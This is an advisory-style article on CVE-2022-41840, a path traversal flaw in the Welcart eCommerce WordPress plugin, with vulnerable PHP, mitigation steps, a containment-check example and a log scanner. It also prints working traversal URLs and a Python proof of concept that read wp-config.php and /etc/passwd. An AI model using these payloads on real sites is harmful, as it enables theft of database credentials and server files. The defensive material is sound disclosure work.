---
Introduction
A critical vulnerability, tracked as CVE-2022-41840, was found in the Welcart eCommerce WordPress plugin and affects all versions up to and including 2.7.7. The flaw lets unauthenticated attackers perform directory traversal and read *any* file on the server that the web server process can access. For eCommerce stores built on Welcart, this can mean exposure of sensitive site or server files, such as configuration files that hold database passwords.
What’s Welcart eCommerce?
Welcart eCommerce is a popular, all-in-one shopping cart plugin for WordPress used mainly in Japan. It powers thousands of online stores—making any vulnerability a big problem for website owners and their customers.
What is Directory Traversal?
Directory traversal (also called “path traversal”) is a security flaw that occurs when a web application does not properly restrict user-supplied input that is used to build a file path. An attacker uses sequences like ../ (“dot dot slash”) to move up the folder tree and reach files outside the intended directory. In practice the same sequence also shows up URL-encoded (`%2e%2e%2f`), double-encoded (`%252e%252e%252f`) or with backslashes (`..\`), which is how it gets past naive filters that only look for the literal string.
Where’s the Flaw in Welcart?
The issue lies in a file-handling endpoint in the plugin that neither sanitizes nor validates the user-supplied file name. Without logging in, an attacker can ask this endpoint for files outside the intended folder simply by including directory traversal sequences in the request.
The vulnerable endpoint is usually something like
/wp-content/plugins/usc-e-shop/functions/redirect.php
The vulnerable PHP code (simplified for clarity) looks roughly like this
```php
<?php
// Inside redirect.php (simplified): the value of ?file= is appended to a
// fixed base directory and streamed back to the client as-is.
if (isset($_GET['file'])) {
    $file = $_GET['file'];                                   // attacker-controlled
    $filepath = '/var/www/html/wp-content/uploads/' . $file; // no normalization, no containment check
    if (file_exists($filepath)) {                            // also true for ../../wp-config.php
        readfile($filepath);                                 // file contents go straight into the response
    }
}
```
What’s wrong here?
The script concatenates user input onto a base path with no normalization and no check that the result still lies inside the uploads directory. `file_exists()` is not a security control; it is equally happy with a path that has climbed out of the folder.
An attacker can exploit this with a crafted URL
https://victim.com/wp-content/plugins/usc-e-shop/functions/redirect.php?file=../../wp-config.php
With the base directory used in the simplified code, two `../` steps land in the WordPress root, so the server reads wp-config.php (database credentials included) and returns it, along with anything else the web server user can read. The number of `../` steps needed depends on the real install layout, which is why attackers simply try increasing depths; surplus `../` segments are ignored once the path reaches the filesystem root, so overshooting costs nothing when the target is given from `/`, such as /etc/passwd.
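The following is an added example, not code from the page or from the Welcart project. It shows the containment check that the snippet above is missing, written in Python so it can be run against a constructed directory tree (the same logic maps onto PHP's `realpath()` plus a prefix comparison). It also shows why the tempting "just delete `../`" fix fails. All directory and file names, including the `naive_strip`, `safe_upload_path` and `demo` helpers, are constructed for this illustration.

```python
import os
import tempfile
from typing import Dict, Optional


def naive_strip(user_file: str) -> str:
    """The kind of 'fix' that does NOT work: delete '../' once.

    '....//' collapses to '../' after a single pass, so traversal survives.
    """
    return user_file.replace("../", "")


def safe_upload_path(base_dir: str, user_file: str) -> Optional[str]:
    """Return the canonical path of user_file inside base_dir, or None if it escapes.

    This is the containment check the simplified redirect.php lacks:
      1. reject NUL bytes (C-level file APIs stop at the first NUL);
      2. refuse absolute paths, which would replace the base entirely;
      3. canonicalize with realpath, resolving '.', '..' and symlinks;
      4. require the result to stay under the canonical base directory.
    """
    if "\x00" in user_file:
        return None
    if os.path.isabs(user_file):
        return None
    base = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base, user_file))
    # commonpath compares whole components, so '/srv/uploads_evil' is not
    # mistaken for something under '/srv/uploads'.
    if os.path.commonpath([base, candidate]) != base:
        return None
    return candidate


def demo() -> Dict[str, bool]:
    """Build a constructed mini WordPress tree in a temp dir and probe it.

    Returns {input: allowed?}. No real site is touched.
    """
    root = tempfile.mkdtemp()
    uploads = os.path.join(root, "wp-content", "uploads")
    os.makedirs(uploads)
    with open(os.path.join(root, "wp-config.php"), "w") as fh:
        fh.write("<?php define('DB_PASSWORD', 'constructed-secret');\n")
    with open(os.path.join(uploads, "invoice.pdf"), "w") as fh:
        fh.write("%PDF-1.4 constructed sample\n")

    probes = [
        "invoice.pdf",                  # legitimate upload
        "../../wp-config.php",          # classic traversal
        "sub/../../../wp-config.php",   # traversal through a non-existent dir
        "/etc/passwd",                  # absolute path replaces the base
        "invoice.pdf\x00.jpg",          # NUL-byte extension trick
    ]
    # A symlink inside uploads/ that points outside: a purely lexical
    # normalization would accept 'link.txt'; realpath does not.
    try:
        os.symlink(os.path.join(root, "wp-config.php"),
                   os.path.join(uploads, "link.txt"))
        probes.append("link.txt")
    except OSError:
        pass  # symlinks unavailable on this platform; skip that probe

    return {p: safe_upload_path(uploads, p) is not None for p in probes}


if __name__ == "__main__":
    for probe, allowed in demo().items():
        print(f"{probe!r:36} -> {'allowed' if allowed else 'REJECTED'}")
    print("naive_strip('....//....//wp-config.php') ->",
          naive_strip("....//....//wp-config.php"))
```

Note that the check canonicalizes the base directory too: on hosts where the document root sits behind a symlink, comparing a resolved candidate against an unresolved base would reject every legitimate file.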
#### Example: Reading /etc/passwd
```http
GET /wp-content/plugins/usc-e-shop/functions/redirect.php?file=../../../../../../etc/passwd HTTP/1.1
Host: victim.com
```
Result: the contents of /etc/passwd are returned in the response body. From the five-level-deep base directory in the simplified code, five `../` steps already reach `/`; the sixth is surplus and harmless.
Here’s a simple Python proof of concept
```python
import requests

# Proof-of-concept request against the (simplified) vulnerable endpoint.
url = 'https://victim.com/wp-content/plugins/usc-e-shop/functions/redirect.php'
# Two '../' reach the WordPress root from the uploads directory used in the
# simplified code; adjust the depth if the target lives elsewhere.
payload = {'file': '../../wp-config.php'}
r = requests.get(url, params=payload, timeout=10)
print(r.status_code)
print(r.text)
```
Note: Replace the payload with any path you want to test.
Mitigation & Fix
1. Update immediately: Upgrade Welcart eCommerce to version 2.8 or later.
2. Check for signs of exploitation: Review web server logs for requests to redirect.php whose `file=` parameter contains `../`, including URL-encoded forms such as `%2e%2e%2f` and `..%2F`. A 200 response with a body size matching wp-config.php or /etc/passwd is a strong indication the read succeeded; if wp-config.php may have been read, rotate the database password and the authentication keys and salts.
3. Restrict file access: Use server configuration to limit what the web server process can read, and never store sensitive files within web-accessible paths.
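The log review in step 2 is easy to get wrong by grepping for the literal string `../`, which misses encoded and double-encoded probes. As an added example, not part of the original page or of any Welcart tooling, here is a small scanner over constructed Apache combined-format log lines; it decodes the `file` parameter the way PHP's `$_GET` would, then keeps decoding until the value stops changing so that double encoding is caught too. The log lines, IP addresses and helper names (`scan_log`, `is_traversal`, `decode_fully`) are all constructed for this illustration.

```python
import re
from typing import Dict, List, Tuple
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache combined-format log lines (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [18/Nov/2022:19:20:01 +0000] "GET /wp-content/plugins/usc-e-shop/functions/redirect.php?file=../../wp-config.php HTTP/1.1" 200 3102 "-" "python-requests/2.28.1"
203.0.113.7 - - [18/Nov/2022:19:20:03 +0000] "GET /wp-content/plugins/usc-e-shop/functions/redirect.php?file=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 2041 "-" "python-requests/2.28.1"
198.51.100.4 - - [18/Nov/2022:19:21:10 +0000] "GET /wp-content/plugins/usc-e-shop/functions/redirect.php?file=%252e%252e/%252e%252e/wp-config.php HTTP/1.1" 404 123 "-" "curl/7.85.0"
192.0.2.9 - - [18/Nov/2022:19:22:00 +0000] "GET /wp-content/plugins/usc-e-shop/functions/redirect.php?file=invoice-1042.pdf HTTP/1.1" 200 58210 "https://shop.example/" "Mozilla/5.0"
192.0.2.9 - - [18/Nov/2022:19:22:05 +0000] "GET /shop/cart/ HTTP/1.1" 200 9981 "https://shop.example/" "Mozilla/5.0"
"""

# client, ident, user, [timestamp], "METHOD target PROTO", status, bytes
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) (\S+)')


def decode_fully(value: str, max_rounds: int = 3) -> Tuple[str, int]:
    """Percent-decode until the value stops changing; returns (value, extra rounds)."""
    rounds = 0
    while rounds < max_rounds:
        nxt = unquote(value)
        if nxt == value:
            break
        value, rounds = nxt, rounds + 1
    return value, rounds


def is_traversal(value: str) -> bool:
    """True if the decoded file parameter climbs a directory, is absolute, or has a NUL."""
    decoded = value.replace("\\", "/")          # treat backslash variants alike
    return (
        ".." in decoded.split("/")
        or decoded.startswith("/")
        or "\x00" in decoded
    )


def scan_log(text: str) -> List[Dict[str, object]]:
    """Return one record per suspicious redirect.php?file= request."""
    hits: List[Dict[str, object]] = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status, size = m.groups()
        parts = urlsplit(target)
        if not parts.path.endswith("/redirect.php"):
            continue
        # parse_qs percent-decodes once, exactly as PHP's $_GET does.
        for raw in parse_qs(parts.query).get("file", []):
            value, extra_rounds = decode_fully(raw)
            if is_traversal(value):
                hits.append({
                    "ip": ip, "time": ts, "status": int(status), "bytes": size,
                    "file": value,
                    "double_encoded": extra_rounds > 0,
                    "likely_success": status == "200",
                })
    return hits


if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG):
        flag = "SUCCESS?" if h["likely_success"] else "blocked "
        enc = " (double-encoded)" if h["double_encoded"] else ""
        print(f"{h['time']} {h['ip']:14} {h['status']} {h['bytes']:>6}B  {flag} {h['file']}{enc}")
```

Two of the three flagged requests returned 200 with plausible body sizes, which is the case where you assume wp-config.php and /etc/passwd are in the attacker's hands and rotate credentials; the double-encoded probe got a 404, which is consistent with PHP not decoding a second time.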
References
- Wordfence CVE-2022-41840 Blog Post
- CVE Details for CVE-2022-41840
- Welcart official plugin change log
Conclusion
If you run a WordPress eCommerce site with Welcart, patch now. CVE-2022-41840 is easy to exploit and dangerous, putting both your site and your customers at high risk. Keep plugins updated and watch your log files for suspicious activity. To learn more about securing your WordPress installation, see the WordPress Security Guide.
Timeline
Published on: 11/18/2022 19:15:00 UTC
Last modified on: 11/21/2022 17:06:00 UTC